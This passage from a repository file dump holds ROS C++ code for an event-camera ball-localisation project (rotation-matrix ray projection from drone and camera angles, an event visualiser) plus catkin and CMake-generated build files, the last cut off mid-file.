rotated_matrix(2, 1) = R_drone(2, 0) * R_inertia(0, 1) + R_drone(2, 1) * R_inertia(1, 1) + R_drone(2, 2) * R_inertia(2, 1);\n\n    rotated_matrix(0, 2) = R_drone(0, 0) * R_inertia(0, 2) + R_drone(0, 1) * R_inertia(1, 2) + R_drone(0, 2) * R_inertia(2, 2);\n\n    rotated_matrix(1, 2) = R_drone(1, 0) * R_inertia(0, 2) + R_drone(1, 1) * R_inertia(1, 2) + R_drone(1, 2) * R_inertia(2, 2);\n\n    rotated_matrix(2, 2) = R_drone(2, 0) * R_inertia(0, 2) + R_drone(2, 1) * R_inertia(1, 2) + R_drone(2, 2) * R_inertia(2, 2);\n    return rotated_matrix;\n}\n\nVector3D<float> rayrotation_events::Update_unit_vector(MatrixXd rotated_matrix)\n{\n    Vector3D<float> t_results;\n    t_results.x = U_v.x * rotated_matrix(0, 0) + U_v.y * rotated_matrix(0, 1) + U_v.z * rotated_matrix(0, 2);\n    t_results.y = U_v.x * rotated_matrix(1, 0) + U_v.y * rotated_matrix(1, 1) + U_v.z * rotated_matrix(1, 
2);\n t_results.z = U_v.x * rotated_matrix(2, 0) + U_v.y * rotated_matrix(2, 1) + U_v.z * rotated_matrix(2, 2);\n\n obj_pos.x=0;\n obj_pos.y =-1*t_results.y*100;\n obj_pos.z=-1*t_results.z*100;\n\n Vector3DMsg point_msg;\n point_msg.data = obj_pos;\n this->_output_port->receiveMsgData(&point_msg);\n\n return t_results;\n}\n\nvoid rayrotation_events::scale_and_translate()\n{\n Vector3D<float> t_results;\n t_results.x = P_b.x - drone_position.x;\n t_results.y = P_b.y - drone_position.y;\n t_results.z = P_b.z - drone_position.z;\n \n double t_s = Vector3D<float>::getL2Norm(t_results);\n \n rotated_unit_vector.x = t_s * rotated_unit_vector.x;\n rotated_unit_vector.y = t_s * rotated_unit_vector.y;\n rotated_unit_vector.z = t_s * rotated_unit_vector.z;\n\n\n\n rotated_unit_vector.x = rotated_unit_vector.x+drone_position.x;\n rotated_unit_vector.y = rotated_unit_vector.y+drone_position.y;\n rotated_unit_vector.z = rotated_unit_vector.z+drone_position.z;\n\n rotated_unit_vector.x = rotated_unit_vector.x-P_b.x;\n rotated_unit_vector.y = rotated_unit_vector.y-P_b.y;\n rotated_unit_vector.z = rotated_unit_vector.z-P_b.z;\n\n\n}\n\nvoid rayrotation_events::update_camera_angles()\n{\n float theta_yaw = -(0.6270 / 346.0) * ball_location.x;//1.45\n float theta_roll = (0.4805 / 260.0) * ball_location.y;//1.19\n\n camera_angle.x = theta_roll;\n camera_angle.y = 0;\n camera_angle.z = theta_yaw;\n\n this->update_rotation_matrices();\n}\n\nvoid rayrotation_events::update_rotation_matrices() \n{\n\n MatrixXd R_drone(3, 3);\n MatrixXd R_inertia(3, 3);\n MatrixXd rotated_matrix(3, 3);\n\n R_inertia = R_o_d.Update(drone_orientation); //Create the rotation matrices\n R_drone = R_d_c.Update(camera_angle);\n\n rotated_matrix = MultiplyMatrices(R_inertia, R_drone); //Multiply the rotation matrices;\n\n rotated_unit_vector = Update_unit_vector(rotated_matrix);\n\n scale_and_translate();\n}\n"
},
{
"alpha_fraction": 0.5420054197311401,
"alphanum_fraction": 0.6043360233306885,
"avg_line_length": 27.41025733947754,
"blob_id": "6b47496829aab4ffaacf430395445101d1f1dd6d",
"content_id": "e3e573670d23e53b39ff77e27b6a33d492ece469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1107,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 39,
"path": "/src/RotationMatrix3by3.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"RotationMatrix3by3.hpp\"\nusing namespace std;\nusing Eigen::MatrixXd;\n\nRotationMatrix3by3::RotationMatrix3by3(/* args */){\n}\n\nRotationMatrix3by3::~RotationMatrix3by3(){\n}\n\nMatrixXd RotationMatrix3by3::Update(Vector3D<float> t_input)\n{ \n \n Matrix3by3::v1.x = cos(t_input.x)*cos(t_input.z) - sin(t_input.x)*sin(t_input.y)*sin(t_input.z);\n Matrix3by3::v1.y = sin(t_input.z)*cos(t_input.y);\n Matrix3by3::v1.z = -sin(t_input.x)*cos(t_input.z)-cos(t_input.x)*sin(t_input.y)*sin(t_input.z);\n\n Matrix3by3::v2.x = -cos(t_input.x)*sin(t_input.z) - sin(t_input.x)*sin(t_input.y)*cos(t_input.z);\n Matrix3by3::v2.y = cos(t_input.z)*cos(t_input.y);\n Matrix3by3::v2.z = sin(t_input.x)*sin(t_input.z)-cos(t_input.x)*sin(t_input.y)*cos(t_input.z);\n\n Matrix3by3::v3.x = sin(t_input.x)*cos(t_input.y);\n Matrix3by3::v3.y = sin(t_input.y);\n Matrix3by3::v3.z = cos(t_input.x)*cos(t_input.y);\n\n MatrixXd m(3,3);\n\n m(0,0)=v1.x;\n m(1,0)=v1.y;\n m(2,0)=v1.z;\n m(0,1)=v2.x;\n m(1,1)=v2.y;\n m(2,1)=v2.z;\n m(0,2)=v3.x;\n m(1,2)=v3.y;\n m(2,2)=v3.z;\n\n return m;\n}"
},
{
"alpha_fraction": 0.719763994216919,
"alphanum_fraction": 0.7271386384963989,
"avg_line_length": 22.413793563842773,
"blob_id": "815ebf8778f0f571a43857eb81b86736f47762ce",
"content_id": "25360c747ed981e8046570cfb3a4f43ce959034a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 678,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 29,
"path": "/include/Event_vis.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <image_transport/image_transport.h>\n#include <cv_bridge/cv_bridge.h>\n#include <sensor_msgs/image_encodings.h>\n#include \"sensor_msgs/Image.h\"\n#include <opencv2/imgproc/imgproc.hpp>\n#include <opencv2/highgui/highgui.hpp>\n#include <opencv2/core/types.hpp>\n#include <dvs_msgs/EventArray.h>\n#include <cmath>\n#include \"std_msgs/Float32.h\"\n#include <ros/ros.h>\n\nclass Event_vis\n{\n public:\n ros::NodeHandle nh_;\n ros::Subscriber sub;\n image_transport::ImageTransport it_;\n image_transport::Publisher pub;\n\n\n const std::string OPENCV_WINDOW = \"Image window\";\n\n Event_vis(ros::NodeHandle &);\n ~Event_vis();\n\n void Events(dvs_msgs::EventArray msg);\n};"
},
{
"alpha_fraction": 0.6335577964782715,
"alphanum_fraction": 0.6526374816894531,
"avg_line_length": 31.418182373046875,
"blob_id": "e80ace53ae7d8f6ab54764513f5b4f8f1c456bf6",
"content_id": "6b1402c345042d1c8c73f315320082b752ab8ad9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1782,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 55,
"path": "/include/rayrotation_events.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"HEAR_math/Matrix3by3.hpp\"\n#include \"RotationMatrix3by3.hpp\"\n#include <opencv2/core/types.hpp>\n#include \"HEAR_msg/FloatMsg.hpp\"\n#include <iostream>\n#include \"std_msgs/UInt64.h\"\n#include <math.h>\n#include <eigen3/Eigen/Dense>\n#include \"HEAR_math/Vector3D.hpp\"\n#include \"HEAR_msg/Vector2DMsg.hpp\"\n#include \"HEAR_msg/Vector3DMsg.hpp\"\n#include <ros/ros.h>\n#include \"HEAR_core/InputPort.hpp\"\n#include \"HEAR_core/OutputPort.hpp\"\n#include \"HEAR_core/Block.hpp\"\n\n\nusing Eigen::MatrixXd;\n\nclass rayrotation_events : public Block\n{\n private:\n Port* _input_port_0;\n Port* _input_port_1;\n Port* _input_port_2;\n Port* _input_port_3;\n Port* _input_port_4;\n Port* _input_port_5;\n Port* _input_port_6;\n Port* _output_port;\n public:\n cv::Point2f ball_location;\n RotationMatrix3by3 R_o_d,R_d_c;\n ros::Time time;\n Vector3D<float> drone_position, drone_orientation,U_v,P_b,camera_angle,rotated_unit_vector;\n MatrixXd MultiplyMatrices(MatrixXd R_inertia, MatrixXd R_drone);\n void scale_and_translate();\n FloatMsg z_parameter,y_parameter,x_parameter;\n Vector3DMsg camera_parameters;\n Vector3DMsg all_parameters;\n Vector3D<float> obj_pos;\n void process(DataMsg* t_msg, Port* t_port);\n Vector3D<float> Update_unit_vector(MatrixXd);\n void update_camera_angles();\n void update_rotation_matrices();\n rayrotation_events();\n bool x,y;\n enum ports_id {IP_0_CAMERA, IP_1_X_POSITION,IP_2_Y_POSITION,IP_3_Z_POSITION,IP_4_ROLL,IP_5_PITCH,IP_6_YAW,OP_0_DATA};\n\n \n\n enum receiving_channels {ch_x, ch_y, ch_z, ch_roll, ch_pitch, ch_yaw,camera,ch_camera_x,ch_camera_y};\n ~rayrotation_events();\n};"
},
{
"alpha_fraction": 0.7454195022583008,
"alphanum_fraction": 0.7492767572402954,
"avg_line_length": 63.875,
"blob_id": "c9fa014a107b31d8e09e608e5ed7ca434a605480",
"content_id": "2daf0186c7b34180c9e147f9f3c50cafbeb40ad8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1037,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 16,
"path": "/build/catkin_generated/package.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"davis_corner\")\nset(davis_corner_VERSION \"0.0.0\")\nset(davis_corner_MAINTAINER \"oussama <[email protected]>\")\nset(davis_corner_PACKAGE_FORMAT \"2\")\nset(davis_corner_BUILD_DEPENDS \"std_msgs\" \"hear_ros_bridge\" \"message_generation\" \"cv_bridge\" \"image_transport\" \"roscpp\" \"sensor_msgs\")\nset(davis_corner_BUILD_EXPORT_DEPENDS \"cv_bridge\" \"image_transport\" \"roscpp\" \"sensor_msgs\" \"std_msgs\" \"hear_ros_bridge\")\nset(davis_corner_BUILDTOOL_DEPENDS \"catkin\" \"catkin_simple\")\nset(davis_corner_BUILDTOOL_EXPORT_DEPENDS )\nset(davis_corner_EXEC_DEPENDS \"cv_bridge\" \"image_transport\" \"roscpp\" \"sensor_msgs\" \"std_msgs\" \"dvs_msgs\" \"eigen_catkin\" \"message_runtime\" \"hear_ros_bridge\")\nset(davis_corner_RUN_DEPENDS \"cv_bridge\" \"image_transport\" \"roscpp\" \"sensor_msgs\" \"std_msgs\" \"dvs_msgs\" \"eigen_catkin\" \"message_runtime\" \"hear_ros_bridge\")\nset(davis_corner_TEST_DEPENDS )\nset(davis_corner_DOC_DEPENDS )\nset(davis_corner_URL_WEBSITE \"\")\nset(davis_corner_URL_BUGTRACKER \"\")\nset(davis_corner_URL_REPOSITORY \"\")\nset(davis_corner_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.5907723307609558,
"alphanum_fraction": 0.614844560623169,
"avg_line_length": 25.945945739746094,
"blob_id": "fbb7402a397d83b09ef46a9d7fb94c88b7f9dd2f",
"content_id": "055dba2e94f01bed5c07bbd099a3cc9ab6c3dfd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 997,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 37,
"path": "/src/Event_vis.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"Event_vis.hpp\"\n\nEvent_vis::Event_vis(ros::NodeHandle &t_nh):it_(nh_)\n{\n\n nh_ = t_nh;\n sub = nh_.subscribe(\"/dvs/events\", 1, &Event_vis::Events,this);\n pub=it_.advertise(\"/EventsImage\",1);\n //cv::namedWindow(OPENCV_WINDOW);\n}\n\nEvent_vis::~Event_vis()\n{\n //cv::destroyWindow(OPENCV_WINDOW);\n}\n\nvoid Event_vis::Events(dvs_msgs::EventArray msg)\n{\n cv::Mat EventsWindow = cv::Mat::zeros(260, 346, CV_8UC1);\n cv_bridge::CvImage img_bridge;\n sensor_msgs::Image img_msg;\n\n for (int i = 0; i < msg.events.size(); i++)\n {\n cv::circle(EventsWindow, cv::Point(msg.events[i].x, msg.events[i].y), 2.0, cv::Scalar(255, 0, 0), -1, 8);\n }\n\n std_msgs::Header header;\n header.seq = 1;\n header.stamp= ros::Time::now();\n img_bridge=cv_bridge::CvImage(header, sensor_msgs::image_encodings::TYPE_8UC1, EventsWindow);\n img_bridge.toImageMsg(img_msg);\n pub.publish(img_msg);\n \n // cv::imshow(\"EventsWindow\", EventsWindow);\n // cv::waitKey(1);\n}\n"
},
{
"alpha_fraction": 0.6941386461257935,
"alphanum_fraction": 0.696578323841095,
"avg_line_length": 37.61915969848633,
"blob_id": "af38a376138b9c8b1c6b40a6f8453b92d6c5f198",
"content_id": "648479d9d119d78efcfe66d115a5b469c5f964bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 48777,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 1263,
"path": "/build/Makefile",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.10\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/ku-t2/catkin_ws_eventcamera/src/davis_corner\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"No interactive CMake dialog available...\"\n\t/usr/bin/cmake -E echo No\\ interactive\\ CMake\\ dialog\\ available.\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: 
test\n\n.PHONY : test/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local/fast\n\n# The main all target\nall: cmake_check_build_system\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/CMakeFiles /home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/CMakeFiles/progress.marks\n\t$(MAKE) -f CMakeFiles/Makefile2 all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\t$(MAKE) -f CMakeFiles/Makefile2 clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\t$(MAKE) -f CMakeFiles/Makefile2 preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\t$(MAKE) -f CMakeFiles/Makefile2 preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\t$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n#=============================================================================\n# Target rules for targets named davis_corner_genpy\n\n# Build rule for target.\ndavis_corner_genpy: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_genpy\n.PHONY : davis_corner_genpy\n\n# fast build rule for target.\ndavis_corner_genpy/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_genpy.dir/build.make CMakeFiles/davis_corner_genpy.dir/build\n.PHONY : davis_corner_genpy/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_py\n\n# Build rule for target.\ndavis_corner_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_py\n.PHONY : davis_corner_generate_messages_py\n\n# fast build rule for target.\ndavis_corner_generate_messages_py/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_generate_messages_py.dir/build.make CMakeFiles/davis_corner_generate_messages_py.dir/build\n.PHONY : davis_corner_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_nodejs\n\n# Build rule for target.\ndavis_corner_generate_messages_nodejs: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_nodejs\n.PHONY : davis_corner_generate_messages_nodejs\n\n# fast build rule for target.\ndavis_corner_generate_messages_nodejs/fast:\n\t$(MAKE) -f 
CMakeFiles/davis_corner_generate_messages_nodejs.dir/build.make CMakeFiles/davis_corner_generate_messages_nodejs.dir/build\n.PHONY : davis_corner_generate_messages_nodejs/fast\n\n#=============================================================================\n# Target rules for targets named ball_detector_node\n\n# Build rule for target.\nball_detector_node: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 ball_detector_node\n.PHONY : ball_detector_node\n\n# fast build rule for target.\nball_detector_node/fast:\n\t$(MAKE) -f CMakeFiles/ball_detector_node.dir/build.make CMakeFiles/ball_detector_node.dir/build\n.PHONY : ball_detector_node/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_genlisp\n\n# Build rule for target.\ndavis_corner_genlisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_genlisp\n.PHONY : davis_corner_genlisp\n\n# fast build rule for target.\ndavis_corner_genlisp/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_genlisp.dir/build.make CMakeFiles/davis_corner_genlisp.dir/build\n.PHONY : davis_corner_genlisp/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_lisp\n\n# Build rule for target.\ndavis_corner_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_lisp\n.PHONY : davis_corner_generate_messages_lisp\n\n# fast build rule for target.\ndavis_corner_generate_messages_lisp/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_generate_messages_lisp.dir/build.make CMakeFiles/davis_corner_generate_messages_lisp.dir/build\n.PHONY : davis_corner_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_eus\n\n# Build rule for target.\ndavis_corner_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_eus\n.PHONY : davis_corner_generate_messages_eus\n\n# fast build rule for target.\ndavis_corner_generate_messages_eus/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_generate_messages_eus.dir/build.make CMakeFiles/davis_corner_generate_messages_eus.dir/build\n.PHONY : davis_corner_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_cpp\n\n# Build rule for target.\ndavis_corner_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_cpp\n.PHONY : davis_corner_generate_messages_cpp\n\n# fast build rule for target.\ndavis_corner_generate_messages_cpp/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_generate_messages_cpp.dir/build.make CMakeFiles/davis_corner_generate_messages_cpp.dir/build\n.PHONY : davis_corner_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named _davis_corner_generate_messages_check_deps_Corners\n\n# Build rule for target.\n_davis_corner_generate_messages_check_deps_Corners: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 _davis_corner_generate_messages_check_deps_Corners\n.PHONY : _davis_corner_generate_messages_check_deps_Corners\n\n# fast build rule for target.\n_davis_corner_generate_messages_check_deps_Corners/fast:\n\t$(MAKE) -f 
CMakeFiles/_davis_corner_generate_messages_check_deps_Corners.dir/build.make CMakeFiles/_davis_corner_generate_messages_check_deps_Corners.dir/build\n.PHONY : _davis_corner_generate_messages_check_deps_Corners/fast\n\n#=============================================================================\n# Target rules for targets named hear_msgs_generate_messages_py\n\n# Build rule for target.\nhear_msgs_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 hear_msgs_generate_messages_py\n.PHONY : hear_msgs_generate_messages_py\n\n# fast build rule for target.\nhear_msgs_generate_messages_py/fast:\n\t$(MAKE) -f CMakeFiles/hear_msgs_generate_messages_py.dir/build.make CMakeFiles/hear_msgs_generate_messages_py.dir/build\n.PHONY : hear_msgs_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named hear_msgs_generate_messages_nodejs\n\n# Build rule for target.\nhear_msgs_generate_messages_nodejs: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 hear_msgs_generate_messages_nodejs\n.PHONY : hear_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nhear_msgs_generate_messages_nodejs/fast:\n\t$(MAKE) -f CMakeFiles/hear_msgs_generate_messages_nodejs.dir/build.make CMakeFiles/hear_msgs_generate_messages_nodejs.dir/build\n.PHONY : hear_msgs_generate_messages_nodejs/fast\n\n#=============================================================================\n# Target rules for targets named hear_msgs_generate_messages_eus\n\n# Build rule for target.\nhear_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 hear_msgs_generate_messages_eus\n.PHONY : hear_msgs_generate_messages_eus\n\n# fast build rule for target.\nhear_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f CMakeFiles/hear_msgs_generate_messages_eus.dir/build.make CMakeFiles/hear_msgs_generate_messages_eus.dir/build\n.PHONY : hear_msgs_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_nodejs\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_nodejs: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_nodejs\n.PHONY : rosgraph_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_nodejs/fast:\n\t$(MAKE) -f CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/build.make CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/build\n.PHONY : rosgraph_msgs_generate_messages_nodejs/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_py\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_py\n.PHONY : rosgraph_msgs_generate_messages_py\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_py/fast:\n\t$(MAKE) -f CMakeFiles/rosgraph_msgs_generate_messages_py.dir/build.make CMakeFiles/rosgraph_msgs_generate_messages_py.dir/build\n.PHONY : rosgraph_msgs_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named std_msgs_generate_messages_eus\n\n# Build rule for target.\nstd_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 
std_msgs_generate_messages_eus\n.PHONY : std_msgs_generate_messages_eus\n\n# fast build rule for target.\nstd_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f CMakeFiles/std_msgs_generate_messages_eus.dir/build.make CMakeFiles/std_msgs_generate_messages_eus.dir/build\n.PHONY : std_msgs_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_lisp\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_lisp\n.PHONY : rosgraph_msgs_generate_messages_lisp\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_lisp/fast:\n\t$(MAKE) -f CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/build.make CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/build\n.PHONY : rosgraph_msgs_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named dvs_msgs_generate_messages_nodejs\n\n# Build rule for target.\ndvs_msgs_generate_messages_nodejs: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 dvs_msgs_generate_messages_nodejs\n.PHONY : dvs_msgs_generate_messages_nodejs\n\n# fast build rule for target.\ndvs_msgs_generate_messages_nodejs/fast:\n\t$(MAKE) -f CMakeFiles/dvs_msgs_generate_messages_nodejs.dir/build.make CMakeFiles/dvs_msgs_generate_messages_nodejs.dir/build\n.PHONY : dvs_msgs_generate_messages_nodejs/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_eus\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_eus\n.PHONY : rosgraph_msgs_generate_messages_eus\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/build.make CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/build\n.PHONY : rosgraph_msgs_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named dvs_msgs_generate_messages_cpp\n\n# Build rule for target.\ndvs_msgs_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 dvs_msgs_generate_messages_cpp\n.PHONY : dvs_msgs_generate_messages_cpp\n\n# fast build rule for target.\ndvs_msgs_generate_messages_cpp/fast:\n\t$(MAKE) -f CMakeFiles/dvs_msgs_generate_messages_cpp.dir/build.make CMakeFiles/dvs_msgs_generate_messages_cpp.dir/build\n.PHONY : dvs_msgs_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_cpp\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_cpp\n.PHONY : rosgraph_msgs_generate_messages_cpp\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_cpp/fast:\n\t$(MAKE) -f CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/build.make CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/build\n.PHONY : rosgraph_msgs_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named roscpp_generate_messages_py\n\n# Build rule for 
